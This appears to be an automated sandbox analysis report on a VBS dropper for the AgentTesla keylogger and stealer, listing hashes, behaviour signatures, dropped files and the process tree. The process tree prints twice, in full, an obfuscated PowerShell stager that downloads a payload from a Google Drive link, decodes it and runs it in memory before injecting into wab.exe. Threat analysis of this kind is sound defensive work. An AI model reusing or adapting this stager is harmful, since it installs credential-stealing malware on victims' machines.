Overview

overview

10

Static

static

1

137dba4596...60.vbs

windows7-x64

10

137dba4596...60.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    139s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    16-05-2024 18:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    137dba4596af3536acacb3ce1190517061eecc9703c1e3533b35319b99fcdc60.vbs

  • Size

    424KB

  • MD5

    daa48dda60b2f2d7095a7190a75bdda8

  • SHA1

    b99a7214799a5f1680e49f5a2f80faf13537c013

  • SHA256

    137dba4596af3536acacb3ce1190517061eecc9703c1e3533b35319b99fcdc60

  • SHA512

    dad8a466a3dd01c5231c736399110cfdc0a02090368d66a8fcb6a527add1c1a1a9c0307823b5424ac4ebe11f9a0a0b3f029e6f7cfd4699945d5d776d4d2f8053

  • SSDEEP

    6144:z74t1fXGwzkAitPzmeI9OQYypkHkSVdtxQ+5iYgbAL0WMhw19+z0yhtHn9eq/+4X:zAJv0ayfOb64MRycngoavbN0vBrbjkLt

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\137dba4596af3536acacb3ce1190517061eecc9703c1e3533b35319b99fcdc60.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1444
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Critic = 1;$Saddelmagerarbejder='Su';$Saddelmagerarbejder+='bstrin';$Saddelmagerarbejder+='g';Function Overindulgently($blyanttegningen){$Tangier=$blyanttegningen.Length-$Critic;For($Harmoniseringsndringer=1;$Harmoniseringsndringer -lt $Tangier;$Harmoniseringsndringer+=2){$Teletjenesterne+=$blyanttegningen.$Saddelmagerarbejder.Invoke( $Harmoniseringsndringer, $Critic);}$Teletjenesterne;}function Tights($Pseudoofficial){. ($Arkivdannelse) ($Pseudoofficial);}$Rutebaaden=Overindulgently 'HM o.zEi lIl,a,/U5 .E0, .( W iDnGdBo wDs. ,NGTH G1B0L..0 ;B MWCi nL6 4B;S x.6T4.;K RrRv :,1,2A1F..0T)K AG eHcSkHoE/K2S0 1 0 0R1 0M1S MF iOr e f.oTxV/L1 2R1 . 0N ';$Skgpantebreves=Overindulgently 'SUSs eFrR- A,g.eLn,tK ';$idiologism=Overindulgently ' hRt tRpIsi:C/ /Td rWiOvPeP.Sg oToIgElSes.Zc oTmS/AuOcC?Geax pFo r tO=,d oJw.nUlHoTaSd,& i,d =V1e7ClNm r h.WT8.cKG l 7Sv,n x NUrTF J W a r 8.y,V.WBjBtE_.M B.H,C ';$Syndfloderne=Overindulgently ',> ';$Arkivdannelse=Overindulgently 'Sipe xJ ';$Frtidspensionisten='Phosphorical';Tights (Overindulgently 'SS eRt.- CTo.n.tTe nRtE - PSaRt hG TU:M\SU n,p a t eSr.n a,l,. tSx tA - VDa lSuSeK S$BFVr t i,d,sFpTeEnisBi,oSnFiRs.t e nG;S ');Tights (Overindulgently ',i.f ( t eFsStF-MpUaHt h TP: \BUUnNpWaMtue rLnBa l . t,xWt.) {SetxsiHt.}.; ');$Bookmark = Overindulgently 'SeBcMh,o ,% aTpFpRdAaOtOau%T\Bt i dMs b eHsLt eHm t,.SS m,aS B&T& .e cMh oF $S ';Tights (Overindulgently ' $ gSl.oGb aGl.: L.nTgFs e,l.s.fGuPlNd ess =.( c,mKdD C/Rc N$RB.o.oVkUmGaIrNkD) ');Tights (Overindulgently ' $.gil o b arl : S k,e,l,l.eBtK=g$Gi dsiSo lCo g.i sUmd..s.p,lDiLtS(E$ SFy nKd f.l oRdTeCr,nOeM)K ');$idiologism=$Skellet[0];Tights (Overindulgently 'l$ g l.o bAaAlS:RONv eJr cVo nUfMiSd ernSc.eIs,1 6.7U=BN e wk-MOLbAj eOcVtE DS y sNtPeDmS.FN eutD.FW,e bSC l,i,e n,tP ');Tights (Overindulgently 'S$,OGvBe r c.o nEfPi dHeSnPcTeNsC1I6T7G..H e aHdSe,r,sU[ $ASFk gUp,amnSt,eSb,rDe vOe sO]U=,$YRKu t.eUb aOadd.eHn ');$Tolvfingertarmene=Overindulgently ',OAv elrsc o nSf.iAd eGn c eBs,1T6P7 . DAoFwSn,lPoRa d FTiflAe ( $ iSd i oAlEo gTiHsNm,, $mB e gLgPakr w eGeBdS)D ';$Tolvfingertarmene=$Lngselsfuldes[1]+$Tolvfingertarmene;$Beggarweed=$Lngselsfuldes[0];Tights (Overindulgently '.$FgTlRo,b aElM:UR.e,vSaVlLi,dMe rGe ngd eO=I(sTnePs t,-.P aLtVh, ,$jBLe.gAgAaFr wCe eBd )C ');while (!$Revaliderende) {Tights (Overindulgently 'S$Rg l o,b aEl,:FS.iUp,pFe nUi,p =K$St r,uUe ') ;Tights $Tolvfingertarmene;Tights (Overindulgently 'OS,t.aKr t -USGl e eEp, .4F ');Tights (Overindulgently 'E$Og,lUoDb,aTlV: RHeSv.a.lHiRd e rKe nDd eS=.(STAeLs tF- PRa.tFhG $DB e.gCg aUr whe efd,)U ') ;Tights (Overindulgently 'P$Pg,l o bFa lP:MA dSr e a m.= $ g.lvo bBaBl.:KG.aurSd e rGo,bOe rDn.eAs.+ +S%.$.SSk e,lcl eVtN.fc.oSu nCtS ') ;$idiologism=$Skellet[$Adream];}$Thaisilkens=345059;$Grundlovsforhr=26762;Tights (Overindulgently ' $ gDl oHb a.lR:,BBe n a rTb elj.dge r.s F=A G e,tA-.CDoKn,t,e nUtM P$ Bie,g g a r wAe e dL ');Tights (Overindulgently 'B$Eg l oRbSa,l,:Pv.uSltg,a rFi z e O=. [ SAyEs t,eSm,.SCRo.nGvTeBr.tU]P:A: F rPo mVB aTsVe 6.4ASMtDr i n.gA(.$NB e nUaIrSb,eFjcd ecr.s ) ');Tights (Overindulgently 'D$ g,l,o bVa lB:EFIo rVm e r n,eMsK .=A T[ S y sPt emmO.OTBe xKtC. E n.cEoBdDiBn gU].:R:SAAS CiI I,.DG estHSRtDrTiPnEgF( $Pv uBl g aSr iSz e ) ');Tights (Overindulgently 'A$Pg.l.o bGaRlB:LI n,tMr uPd r,eSsRs =U$TF,oBr m,eSrAn,eBsS.,s u b.sJtDr i,nBg (.$UT,hCaHiEs i l k e.n.s ,S$ GUrSu.n.dSl,o v.sTfKo.rRhNr ). ');Tights $Intrudress;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1660
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\tidsbestemt.Sma && echo $"
        3⤵
          PID:2724
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Critic = 1;$Saddelmagerarbejder='Su';$Saddelmagerarbejder+='bstrin';$Saddelmagerarbejder+='g';Function Overindulgently($blyanttegningen){$Tangier=$blyanttegningen.Length-$Critic;For($Harmoniseringsndringer=1;$Harmoniseringsndringer -lt $Tangier;$Harmoniseringsndringer+=2){$Teletjenesterne+=$blyanttegningen.$Saddelmagerarbejder.Invoke( $Harmoniseringsndringer, $Critic);}$Teletjenesterne;}function Tights($Pseudoofficial){. ($Arkivdannelse) ($Pseudoofficial);}$Rutebaaden=Overindulgently 'HM o.zEi lIl,a,/U5 .E0, .( W iDnGdBo wDs. ,NGTH G1B0L..0 ;B MWCi nL6 4B;S x.6T4.;K RrRv :,1,2A1F..0T)K AG eHcSkHoE/K2S0 1 0 0R1 0M1S MF iOr e f.oTxV/L1 2R1 . 0N ';$Skgpantebreves=Overindulgently 'SUSs eFrR- A,g.eLn,tK ';$idiologism=Overindulgently ' hRt tRpIsi:C/ /Td rWiOvPeP.Sg oToIgElSes.Zc oTmS/AuOcC?Geax pFo r tO=,d oJw.nUlHoTaSd,& i,d =V1e7ClNm r h.WT8.cKG l 7Sv,n x NUrTF J W a r 8.y,V.WBjBtE_.M B.H,C ';$Syndfloderne=Overindulgently ',> ';$Arkivdannelse=Overindulgently 'Sipe xJ ';$Frtidspensionisten='Phosphorical';Tights (Overindulgently 'SS eRt.- CTo.n.tTe nRtE - PSaRt hG TU:M\SU n,p a t eSr.n a,l,. tSx tA - VDa lSuSeK S$BFVr t i,d,sFpTeEnisBi,oSnFiRs.t e nG;S ');Tights (Overindulgently ',i.f ( t eFsStF-MpUaHt h TP: \BUUnNpWaMtue rLnBa l . t,xWt.) {SetxsiHt.}.; ');$Bookmark = Overindulgently 'SeBcMh,o ,% aTpFpRdAaOtOau%T\Bt i dMs b eHsLt eHm t,.SS m,aS B&T& .e cMh oF $S ';Tights (Overindulgently ' $ gSl.oGb aGl.: L.nTgFs e,l.s.fGuPlNd ess =.( c,mKdD C/Rc N$RB.o.oVkUmGaIrNkD) ');Tights (Overindulgently ' $.gil o b arl : S k,e,l,l.eBtK=g$Gi dsiSo lCo g.i sUmd..s.p,lDiLtS(E$ SFy nKd f.l oRdTeCr,nOeM)K ');$idiologism=$Skellet[0];Tights (Overindulgently 'l$ g l.o bAaAlS:RONv eJr cVo nUfMiSd ernSc.eIs,1 6.7U=BN e wk-MOLbAj eOcVtE DS y sNtPeDmS.FN eutD.FW,e bSC l,i,e n,tP ');Tights (Overindulgently 'S$,OGvBe r c.o nEfPi dHeSnPcTeNsC1I6T7G..H e aHdSe,r,sU[ $ASFk gUp,amnSt,eSb,rDe vOe sO]U=,$YRKu t.eUb aOadd.eHn ');$Tolvfingertarmene=Overindulgently ',OAv elrsc o nSf.iAd eGn c eBs,1T6P7 . DAoFwSn,lPoRa d FTiflAe ( $ iSd i oAlEo gTiHsNm,, $mB e gLgPakr w eGeBdS)D ';$Tolvfingertarmene=$Lngselsfuldes[1]+$Tolvfingertarmene;$Beggarweed=$Lngselsfuldes[0];Tights (Overindulgently '.$FgTlRo,b aElM:UR.e,vSaVlLi,dMe rGe ngd eO=I(sTnePs t,-.P aLtVh, ,$jBLe.gAgAaFr wCe eBd )C ');while (!$Revaliderende) {Tights (Overindulgently 'S$Rg l o,b aEl,:FS.iUp,pFe nUi,p =K$St r,uUe ') ;Tights $Tolvfingertarmene;Tights (Overindulgently 'OS,t.aKr t -USGl e eEp, .4F ');Tights (Overindulgently 'E$Og,lUoDb,aTlV: RHeSv.a.lHiRd e rKe nDd eS=.(STAeLs tF- PRa.tFhG $DB e.gCg aUr whe efd,)U ') ;Tights (Overindulgently 'P$Pg,l o bFa lP:MA dSr e a m.= $ g.lvo bBaBl.:KG.aurSd e rGo,bOe rDn.eAs.+ +S%.$.SSk e,lcl eVtN.fc.oSu nCtS ') ;$idiologism=$Skellet[$Adream];}$Thaisilkens=345059;$Grundlovsforhr=26762;Tights (Overindulgently ' $ gDl oHb a.lR:,BBe n a rTb elj.dge r.s F=A G e,tA-.CDoKn,t,e nUtM P$ Bie,g g a r wAe e dL ');Tights (Overindulgently 'B$Eg l oRbSa,l,:Pv.uSltg,a rFi z e O=. [ SAyEs t,eSm,.SCRo.nGvTeBr.tU]P:A: F rPo mVB aTsVe 6.4ASMtDr i n.gA(.$NB e nUaIrSb,eFjcd ecr.s ) ');Tights (Overindulgently 'D$ g,l,o bVa lB:EFIo rVm e r n,eMsK .=A T[ S y sPt emmO.OTBe xKtC. E n.cEoBdDiBn gU].:R:SAAS CiI I,.DG estHSRtDrTiPnEgF( $Pv uBl g aSr iSz e ) ');Tights (Overindulgently 'A$Pg.l.o bGaRlB:LI n,tMr uPd r,eSsRs =U$TF,oBr m,eSrAn,eBsS.,s u b.sJtDr i,nBg (.$UT,hCaHiEs i l k e.n.s ,S$ GUrSu.n.dSl,o v.sTfKo.rRhNr ). ');Tights $Intrudress;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2484
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\tidsbestemt.Sma && echo $"
            4⤵
              PID:2460
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2776

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0W86ULZRC0V5Z13QZU5X.temp
        Filesize

        7KB

        MD5

        1ef3347960ea8695d70b73c54a06aee8

        SHA1

        2f04027052a33d76aeec1439594639f5dc1be135

        SHA256

        5b7743ab225f2c900755f38d722145c6cf974bca6e105bbc50838998e69f1245

        SHA512

        54db08da4008dd8005626edb626f87025f96db8da2905d0fe23f20b2a09218f9539d0d5f7e00583ac9583f27d60db288e0a911c94bdff2248ecbaec19fb9df1e

        Download Submit

      • C:\Users\Admin\AppData\Roaming\tidsbestemt.Sma
        Filesize

        484KB

        MD5

        37b5e04829f22394ecd93d96a6abb364

        SHA1

        1100d43b7f38319d657ccfdaa1c23b2fa9b8f787

        SHA256

        d81b1ebdbeacbeeb7ea1b5398ff1f2b2ff76a2386d23850f1c5ad0758475a2ac

        SHA512

        3c462bfc901eb7d66eb7875503b604b2b646857cac49a23713a066b8f8a5accadff453772b76285b769b01b6de7ec859338e416489dff38434cc17cdcb8a1915

        Download Submit

      • memory/1660-8-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1660-7-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1660-4-0x000007FEF53DE000-0x000007FEF53DF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1660-9-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1660-10-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1660-11-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1660-6-0x0000000002050000-0x0000000002058000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1660-5-0x000000001B6A0000-0x000000001B982000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/1660-17-0x000007FEF53DE000-0x000007FEF53DF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/1660-18-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/1660-45-0x000007FEF5120000-0x000007FEF5ABD000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2484-19-0x00000000065A0000-0x00000000082E5000-memory.dmp

        Filesize

        29.3MB

        Download

      • memory/2776-43-0x00000000008F0000-0x0000000001952000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/2776-44-0x00000000008F0000-0x0000000001952000-memory.dmp

        Filesize

        16.4MB

        Download

      • memory/2776-46-0x00000000008F0000-0x0000000000932000-memory.dmp

        Filesize

        264KB

        Download